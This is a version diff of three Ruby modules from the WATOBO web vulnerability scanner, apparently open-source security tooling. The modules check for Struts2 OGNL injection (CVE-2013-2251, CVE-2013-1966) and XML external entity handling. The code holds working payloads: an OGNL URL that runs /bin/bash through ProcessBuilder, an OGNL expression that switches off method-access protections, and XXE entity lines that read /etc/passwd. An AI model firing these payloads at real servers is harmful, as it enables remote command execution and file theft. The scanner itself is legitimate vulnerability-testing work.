watobo 0.9.21 → 0.9.23

data/modules/active/struts2/default_handler_ognl.rb

@@ -1,116 +1,107 @@
-#.
-# default_handler_ognl.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# @private 
+module Watobo#:nodoc: all
+  module Modules
+    module Active
+      module Struts2
+        
+        
+        class Default_handler_ognl < Watobo::ActiveCheck
+           @@tested_directories = Hash.new
+          
+          threat =<<'EOF'
+A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution
 
-# @private 
-module Watobo#:nodoc: all
-  module Modules
-    module Active
-      module Struts2
-        
-        
-        class Default_handler_ognl < Watobo::ActiveCheck
-           @@tested_directories = Hash.new
-          
-          threat =<<'EOF'
-A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution
-
-Source: http://struts.apache.org/release/2.3.x/docs/s2-016.html
-CVE: CVE-2013-2251
-EOF
-
-#
-            details =<<'EOD'           
-Example for code execution:
-http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
-EOD
-
-            
-            measure = "Update Struts2 to version >2.3.15.1"
-            
-            @info.update(
-                         :check_name => 'Struts2 default handlers',    # name of check which briefly describes functionality, will be used for tree and progress views
-            :check_group => "Struts",
-            :description => "Check for struts2 default handlers which doesn't sanitize parameters.",   # description of checkfunction
-            :author => "Andreas Schmidt", # author of check
-            :version => "1.0"   # check version
-            )
-            
-            @finding.update(
-                            :threat => threat,        # thread of vulnerability, e.g. loss of information
-                            :class => "Struts2 - default handlers",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
-            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
-            :rating => VULN_RATING_CRITICAL,
-            :measure => measure,
-            :details => details
-            )
-          
-          def initialize(project, prefs={})
-            super(project, prefs)
-            
-           @vuln_handlers = %w( action redirect redirectAction)
-            
-            def reset
-               @@tested_directories.clear
-            end
-            
-            
-          end
-          
-          
-          def generateChecks(chat)    
-            begin   
-              # 
-             path = chat.request.dir
-             return true if @@tested_directories.has_key?(path)
-             
-             @@tested_directories[path] = true
-             @vuln_handlers.each do |handler|
-                checker = proc {
-                  results = {}
-                  request = nil
-                  response = nil
-                  test_request = chat.copyRequest
-                     
-                  test_value = '?' + CGI::escape("#{handler}:watobo_%{10000-1}")
-                  
-                  test_request.replaceElement test_value
-                  
-                  request, response = doRequest(test_request)
-                  
-                  if response.headers.select{|h| h =~ /^Location:.*(_9999)/}.length > 0
-                      
-                      addFinding( request, response,
-                                 :check_pattern => test_value,
-                                 :proof_pattern => "Location:.*_9999",
-                                 :test_item => handler,
-                                 :chat => chat,
-                                 :title => "[#{request.dir}] - #{handler}"
-                      )
-                  end
-                   
-                    [ request, response ]
-                  }
-                  yield checker
-               
-              end
-              
-            rescue => bang
-              puts bang
-              puts bang.backtrace if $DEBUG
-              puts "ERROR!! #{Module.nesting[0].name}"
-              raise
-            end
-          end
-          
-        end
-        
-      end
-    end
-  end
-end
+Source: http://struts.apache.org/release/2.3.x/docs/s2-016.html
+CVE: CVE-2013-2251
+EOF
+
+#
+            details =<<'EOD'           
+Example for code execution:
+http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
+EOD
+
+            
+            measure = "Update Struts2 to version >2.3.15.1"
+            
+            @info.update(
+                         :check_name => 'Struts2 default handlers',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :check_group => "Struts",
+            :description => "Check for struts2 default handlers which doesn't sanitize parameters.",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "1.0"   # check version
+            )
+            
+            @finding.update(
+                            :threat => threat,        # thread of vulnerability, e.g. loss of information
+                            :class => "Struts2 - default handlers",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
+            :rating => VULN_RATING_CRITICAL,
+            :measure => measure,
+            :details => details
+            )
+          
+          def initialize(project, prefs={})
+            super(project, prefs)
+            
+           @vuln_handlers = %w( action redirect redirectAction)
+            
+            def reset
+               @@tested_directories.clear
+            end
+            
+            
+          end
+          
+          
+          def generateChecks(chat)    
+            begin   
+              # 
+             path = chat.request.dir
+             return true if @@tested_directories.has_key?(path)
+             
+             @@tested_directories[path] = true
+             @vuln_handlers.each do |handler|
+                checker = proc {
+                  results = {}
+                  request = nil
+                  response = nil
+                  test_request = chat.copyRequest
+                     
+                  test_value = '?' + CGI::escape("#{handler}:watobo_%{10000-1}")
+                  
+                  test_request.replaceElement test_value
+                  
+                  request, response = doRequest(test_request)
+                  
+                  if response.headers.select{|h| h =~ /^Location:.*(_9999)/}.length > 0
+                      
+                      addFinding( request, response,
+                                 :check_pattern => test_value,
+                                 :proof_pattern => "Location:.*_9999",
+                                 :test_item => handler,
+                                 :chat => chat,
+                                 :title => "[#{request.dir}] - #{handler}"
+                      )
+                  end
+                   
+                    [ request, response ]
+                  }
+                  yield checker
+               
+              end
+              
+            rescue => bang
+              puts bang
+              puts bang.backtrace if $DEBUG
+              puts "ERROR!! #{Module.nesting[0].name}"
+              raise
+            end
+          end
+          
+        end
+        
+      end
+    end
+  end
+end

data/modules/active/struts2/include_params_ognl.rb

@@ -1,115 +1,106 @@
-#.
-# include_params_ognl.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+# @private 
+module Watobo#:nodoc: all
+  module Modules
+    module Active
+      module Struts2
+        
+        
+        class Include_params_ognl < Watobo::ActiveCheck
+          
+          threat =<<'EOF'
+A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution
 
-# @private 
-module Watobo#:nodoc: all
-  module Modules
-    module Active
-      module Struts2
-        
-        
-        class Include_params_ognl < Watobo::ActiveCheck
-          
-          threat =<<'EOF'
-A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution
-
-Source: http://struts.apache.org/release/2.3.x/docs/s2-013.html
-CVE: CVE-2013-1966
-EOF
-
-#
-            details =<<'EOD'           
-Example for code execution:
-http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
-EOD
-
-            
-            measure = "Update Struts2 to version >2.3.14"
-            
-            @info.update(
-                         :check_name => 'Struts2 includeParams',    # name of check which briefly describes functionality, will be used for tree and progress views
-            :check_group => "Struts",
-            :description => "Check for vulnerable includeParams attribute.",   # description of checkfunction
-            :author => "Andreas Schmidt", # author of check
-            :version => "1.0"   # check version
-            )
-            
-            @finding.update(
-                            :threat => threat,        # thread of vulnerability, e.g. loss of information
-                            :class => "Struts2 - includeParams",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
-            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
-            :rating => VULN_RATING_CRITICAL,
-            :measure => measure,
-            :details => details
-            )
-          
-          def initialize(project, prefs={})
-            super(project, prefs)
-            
-          end
-          
-          
-          def generateChecks(chat)    
-            begin   
-
-                checker = proc {
-                  results = {}
-                  request = nil
-                  response = nil
-                  test_request = chat.copyRequest
-                     
-                  
-                  test_value = "%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(INJ),#writer.close())}"
-                  marks = [ "INJ" , Time.now.to_i.to_s ]
-                  
-                  inj_str = marks.map{|m| "'#{m}'"}.join("+")
-                  
-                  test_value.gsub!(/INJ/, inj_str)
-                  
-                  tparam = Watobo::UrlParameter.new( :name => "watobo", :value => CGI::escape(test_value) )
-                  
-                  test_request.url.set tparam
-                  #puts test_request.first
-                  
-                  request, response = doRequest(test_request)
-                  
-                  if response.respond_to? :body
-                    unless response.body.nil?
-                       body = response.body.unpack("C*").pack("C*")
-                       #puts body
-                       proof = marks.join
-                       if response.body.to_s =~ /#{proof}/
-                           addFinding( request, response,
-                                 :check_pattern => CGI::escape(test_value),
-                                 :proof_pattern => "#{proof}",
-                                 :chat => chat,
-                                 :title => "[includeParams] - #{request.file}"
-                                 )
-                       end
-                    end
-                  end
-                   
-                    [ request, response ]
-                  }
-                  yield checker
-              
-            rescue => bang
-              puts bang
-              puts bang.backtrace if $DEBUG
-              puts "ERROR!! #{Module.nesting[0].name}"
-              raise
-            end
-          end
-          
-        end
-        
-      end
-    end
-  end
-end
+Source: http://struts.apache.org/release/2.3.x/docs/s2-013.html
+CVE: CVE-2013-1966
+EOF
+
+#
+            details =<<'EOD'           
+Example for code execution:
+http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
+EOD
+
+            
+            measure = "Update Struts2 to version >2.3.14"
+            
+            @info.update(
+                         :check_name => 'Struts2 includeParams',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :check_group => "Struts",
+            :description => "Check for vulnerable includeParams attribute.",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "1.0"   # check version
+            )
+            
+            @finding.update(
+                            :threat => threat,        # thread of vulnerability, e.g. loss of information
+                            :class => "Struts2 - includeParams",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
+            :rating => VULN_RATING_CRITICAL,
+            :measure => measure,
+            :details => details
+            )
+          
+          def initialize(project, prefs={})
+            super(project, prefs)
+            
+          end
+          
+          
+          def generateChecks(chat)    
+            begin   
+
+                checker = proc {
+                  results = {}
+                  request = nil
+                  response = nil
+                  test_request = chat.copyRequest
+                     
+                  
+                  test_value = "%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(INJ),#writer.close())}"
+                  marks = [ "INJ" , Time.now.to_i.to_s ]
+                  
+                  inj_str = marks.map{|m| "'#{m}'"}.join("+")
+                  
+                  test_value.gsub!(/INJ/, inj_str)
+                  
+                  tparam = Watobo::UrlParameter.new( :name => "watobo", :value => CGI::escape(test_value) )
+                  
+                  test_request.url.set tparam
+                  #puts test_request.first
+                  
+                  request, response = doRequest(test_request)
+                  
+                  if response.respond_to? :body
+                    unless response.body.nil?
+                       body = response.body.unpack("C*").pack("C*")
+                       #puts body
+                       proof = marks.join
+                       if response.body.to_s =~ /#{proof}/
+                           addFinding( request, response,
+                                 :check_pattern => CGI::escape(test_value),
+                                 :proof_pattern => "#{proof}",
+                                 :chat => chat,
+                                 :title => "[includeParams] - #{request.file}"
+                                 )
+                       end
+                    end
+                  end
+                   
+                    [ request, response ]
+                  }
+                  yield checker
+              
+            rescue => bang
+              puts bang
+              puts bang.backtrace if $DEBUG
+              puts "ERROR!! #{Module.nesting[0].name}"
+              raise
+            end
+          end
+          
+        end
+        
+      end
+    end
+  end
+end

data/modules/active/xml/xml_xxe.rb

@@ -1,134 +1,123 @@
-#.
-# xml_xxe.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 # @private
-module Watobo#:nodoc: all
-  module Modules
-    module Active
-      module Xml
-        class Xml_xxe < Watobo::ActiveCheck
-          # This module checks if DTD is accepted
-          # The idea is to use regular parameters and convert them to entity
+module Watobo #:nodoc: all
+  module Modules
+    module Active
+      module Xml
+        class Xml_xxe < Watobo::ActiveCheck
+          # This module checks if DTD is accepted
+          # The idea is to use regular parameters and convert them to entity
           # if the result is the same, chances are good that XXE attacks will work
           #
           # Links:
           # http://www.w3.org/TR/2004/REC-xml-20040204/#sec-external-ent
-          
+
           # Exploitation notes:
           # https://www.christian-schneider.net/GenericXxeDetection.html
           # <!ENTITY % three SYSTEM "file:///etc/passwd">
-          # <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-          
-          @info.update(
-            :check_name => 'XML-XXE',    # name of check which briefly describes functionality, will be used for tree and progress views
-            :check_group => "XML",
-            :description => "XML eXternal Entity (XXE).",   # description of checkfunction
-            :author => "Andreas Schmidt", # author of check
-            :version => "0.9"   # check version
-            )
-            
-            threat = "https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)"
-            
-            measure = "Disable external entities."
-            
-            @finding.update(
-            :threat => threat,        # thread of vulnerability, e.g. loss of information
-            :class => "External Entities",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
-            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
-            :rating => VULN_RATING_CRITICAL,
-            :measure => measure
-            )
-          
-          def initialize(project, prefs={})
-            super(project, prefs)
-            
-          end
-          
-          def generateChecks(chat)
-            begin              
-              if ( chat.request.content_type =~ /xml/ ) and chat.request.has_body?
-                puts "XXE-TEST"
-                # first we do a request with an
-                base = chat.copyRequest
-                base_request, base_response = doRequest(base)
+          # <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
+
+          @info.update(
+              :check_name => 'XML-XXE', # name of check which briefly describes functionality, will be used for tree and progress views
+              :check_group => "XML",
+              :description => "XML eXternal Entity (XXE).", # description of checkfunction
+              :author => "Andreas Schmidt", # author of check
+              :version => "0.9" # check version
+          )
+
+          threat = "https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)"
+
+          measure = "Disable external entities."
+
+          @finding.update(
+              :threat => threat, # thread of vulnerability, e.g. loss of information
+              :class => "External Entities", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+              :type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
+              :rating => VULN_RATING_CRITICAL,
+              :measure => measure
+          )
+
+          def initialize(project, prefs={})
+            super(project, prefs)
+
+          end
+
+          def generateChecks(chat)
+            begin
+              if (chat.request.content_type =~ /xml/) and chat.request.has_body?
+                # first we do a request with an
+                base = chat.copyRequest
+                base_request, base_response = doRequest(base)
                 return unless base_response.has_body?
-                puts " *create entity packets ..."
                 create_entity_packets(chat.request.body).each do |packet|
-                  puts packet
-                  checker = proc {
-                    begin                      
-                      test_request = nil
-                    test_response = nil
-                    test = chat.copyRequest
-                    test.setData packet.to_s
-                    test_request, test_response = doRequest(test)
-                    #puts test_response.status
-                    
-                    if test_response.has_body? and test_response.body == base_response.body
-                     
-                      addFinding(test_request,test_response,
-                      :test_item => "ENTITY",
-                      :check_pattern => "ENTITY",
-                      :chat => chat,
-                      :title => "[#{chat.request.path}] - ENTITY",
-                      :debug => true
-                      )
-                    end
-                    rescue => bang
-                      puts bang
-                      puts bang.backtrace if $DEBUG                      
-                    end
-                    [ test_request, test_response ]
-                  }
-                  yield checker
-                  
-                   end
-              end
-            rescue => bang
-              puts bang
-            end
-          end
-          
-          private
-          
-          def create_entity_packets(xml_string)
-  xml_packets = []
-
-  xmlbase = Nokogiri::XML(xml_string)
-  xmlbase.traverse do |node|
-    if node.text?
-      #next if node.parent.namespace.nil?
-      unless node.text.strip.empty?
-        xml = Nokogiri::XML(xml_string)
-        xml.create_internal_subset("#{node.parent.name}", nil, nil)
-        node_name = ""
-        node_name << "#{node.parent.namespace.prefix}:" if node.parent.namespace.respond_to? :prefix
-        node_name << "#{node.parent.name}"
-        add_entity(xml, "#{node_name}", "#{node.parent.name}", "#{node.text}")
-        xml_packets << xml
-
-      end
-    end
-  end
-  xml_packets
-end
-
-def add_entity(xml, node_name, entity_name, value)
-  xml.create_entity(entity_name, Nokogiri::XML::EntityDecl::INTERNAL_GENERAL, nil, nil, value)
-  entity = Nokogiri::XML::EntityReference.new xml, entity_name
-  nodeset = xml.xpath("//#{node_name}")  
-  nodeset.first.send(:native_content=, entity.to_s ) unless nodeset.empty?  
-end
-
-        end
-        # --> eo namespace    
-      end
-    end
-  end
+                  checker = proc {
+                    begin
+                      test_request = nil
+                      test_response = nil
+                      test = chat.copyRequest
+                      test.setData packet.to_s
+                      test_request, test_response = doRequest(test)
+                      #puts test_response.status
+
+                      if test_response.has_body? and test_response.body == base_response.body
+
+                        addFinding(test_request, test_response,
+                                   :test_item => "ENTITY",
+                                   :check_pattern => "ENTITY",
+                                   :chat => chat,
+                                   :title => "[#{chat.request.path}] - ENTITY",
+                                   :debug => true
+                        )
+                      end
+                    rescue => bang
+                      puts bang
+                      puts bang.backtrace if $DEBUG
+                    end
+                    [test_request, test_response]
+                  }
+                  yield checker
+
+                end
+              end
+            rescue => bang
+              puts bang
+              puts bang.backtrace if $DEBUG
+            end
+          end
+
+          private
+
+          def create_entity_packets(xml_string)
+            xml_packets = []
+
+            xmlbase = Nokogiri::XML(xml_string)
+            xmlbase.traverse do |node|
+              if node.text?
+                #next if node.parent.namespace.nil?
+                unless node.text.strip.empty?
+                  xml = Nokogiri::XML(xml_string)
+                  xml.create_internal_subset("#{node.parent.name}", nil, nil)
+                  node_name = ""
+                  node_name << "#{node.parent.namespace.prefix}:" if node.parent.namespace.respond_to? :prefix
+                  node_name << "#{node.parent.name}"
+                  add_entity(xml, "#{node_name}", "#{node.parent.name}", "#{node.text}")
+                  xml_packets << xml
+
+                end
+              end
+            end
+            xml_packets
+          end
+
+          def add_entity(xml, node_name, entity_name, value)
+            xml.create_entity(entity_name, Nokogiri::XML::EntityDecl::INTERNAL_GENERAL, nil, nil, value)
+            entity = Nokogiri::XML::EntityReference.new xml, entity_name
+            nodeset = xml.xpath("//#{node_name}")
+            nodeset.first.send(:native_content=, entity.to_s) unless nodeset.empty?
+          end
+
+        end
+        # --> eo namespace    
+      end
+    end
+  end
 end